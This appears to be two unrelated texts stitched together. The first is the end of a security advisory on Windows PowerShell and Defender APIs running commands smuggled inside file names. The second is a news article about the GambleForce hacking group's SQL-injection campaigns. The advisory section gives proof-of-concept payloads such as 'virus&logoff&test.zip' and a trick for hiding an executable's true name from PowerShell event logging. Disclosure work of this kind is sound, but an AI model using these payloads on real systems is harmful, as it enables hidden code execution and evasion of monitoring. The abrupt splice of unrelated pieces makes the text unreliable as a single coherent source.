[PS Log ID 403 Snippet]  
Engine state is changed from Available to Stopped. 

Details:   
  NewEngineState=Stopped  
  PreviousEngineState=Available

  SequenceNumber=25

  HostName=ConsoleHost  
  HostVersion=5.1.19041.1682  
  HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0  
  HostApplication=powershell get-filehash 'Infected  
  EngineVersion=5.1.19041.1682

[Exploit/POC]  
powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Run some malware plus bypass logging of true file name:  
C:\Users\gg\Downloads>powershell get-filehash  'Infected&Malware;.zip'  -algorithm  md5  
PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.

Defender Anti-Malware API:  
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Call ping cmd using double "&":  
C:\>powershell Get-Filehash  'powerfail&ping 8.8.8.8&.txt'  -algorithm  md5

Call a Windows cmd to Logoff the victim:  
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

We have options:

A) to call commands use double "&" --> 'virus&logoff&test.zip'  
B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'

[References]  
https://github.com/hyp3rlinx/PSTrojanFile  
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt  
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt

[Network Access]  
Local

[Severity]  
High

[Disclosure Timeline]  
Vendor Notification: circa 2019  
December 27, 2023 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Windows PowerShell Code Execution / Event Log Bypass

By Waqas
Yet another day, yet another threat actor posing a danger to the cybersecurity of companies globally.
This is a post from HackRead.com Read the original post: New Hacker Group GambleForce Hacks Targets with Open Source Tools

Cybersecurity researchers at Singapore-based Group-IB have unmasked EagleStrike, a subgroup of the GambleForce hacker group. They are opportunistic hackers exploiting simple vulnerabilities.

In September 2023, Group-IB’s Threat Intelligence unit discovered a command and control server hosting publicly available open-source **pentesting tools**, none being custom-made, designed for SQL injections.

The attacker was identified as “GambleForce,” who had targeted 24 organizations in government, gambling, retail, travel, and job-seeking sectors across 8 countries between September and December 2023, successfully compromising 6 websites in Australia, Indonesia, the Philippines, and South Korea. The group has also targeted websites in China, India, and Thailand.

The group uses basic yet effective techniques like SQL injections. It exploits vulnerable website content management systems (CMS) to extract user databases containing logins, hashed passwords, and tables from accessible databases.

GambleForce is not selective in its targets but collects hashed and plain text credentials. This suggests a broader motive beyond targeted attacks, possibly amassing data for future exploits or selling on the **dark web**.

The threat actors aim to exfiltrate any available information within targeted databases, such as hashed and plain text user credentials. The group’s actions with the stolen data remain unknown.

In an attack targeting Brazil, GambleForce exploited **CVE-2023-23752**, a vulnerability in the Joomla CMS, and snatched data directly from contact form submissions, showcasing their adaptability and willingness to improvise.

Further probing revealed that GambleForce uses open-source tools like dirsearch, redis-rogue-getshell, and **Tinyproxy** for directory brute-forcing, web traffic intercepting, and SQL injections to exploit vulnerabilities in database servers. Their preferred tool is sqlmap, a pentesting tool that exploits SQL injection vulnerabilities. 

Researchers also found **Cobalt Strike**, a popular pen-testing framework, on their server, showcasing commands in Chinese. It is worth noting that recently Chinese scammers have wreaked havoc by creating cloned versions of legitimate websites and redirecting visitors to gambling sites. 

In November 2023, **Hackread.com reported** about the activities of Chinese hackers in which MindaNews, a Philippine newspaper, discovered a Chinese clone of its website (mmart-inn.com) that has been illegally replicating the newspaper’s content for two years, with the most recent translation being from February 2023.

In its **blog post**, Group-IB’s Threat Intelligence wrote that its researchers shared the recent findings with its 24/7 Computer Emergency Response Team (CERT-GIB), which took down the cybercriminals’ C2 server. GambleForce is likely to regroup/rebuild its infrastructure before launching new attacks.

Nevertheless, the case goes on to show that even the most basic security gaps can have significant consequences, underscoring the need for a layered defence strategy that prioritizes patching known vulnerabilities and implementing vital security controls.

****_RELATED ARTICLES_****

1.  **Domain Squatting and Brand Hijacking: A Silent Threat**
2.  **Chinese APT Posing as Cloud Services to Spy on Cambodia**
3.  **Chinese APT spying on Vietnam military with FoundCore RAT**
4.  **Hackers attack Casino’s fish tank thermometer to obtain data**
5.  **ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store**

Tag

#redis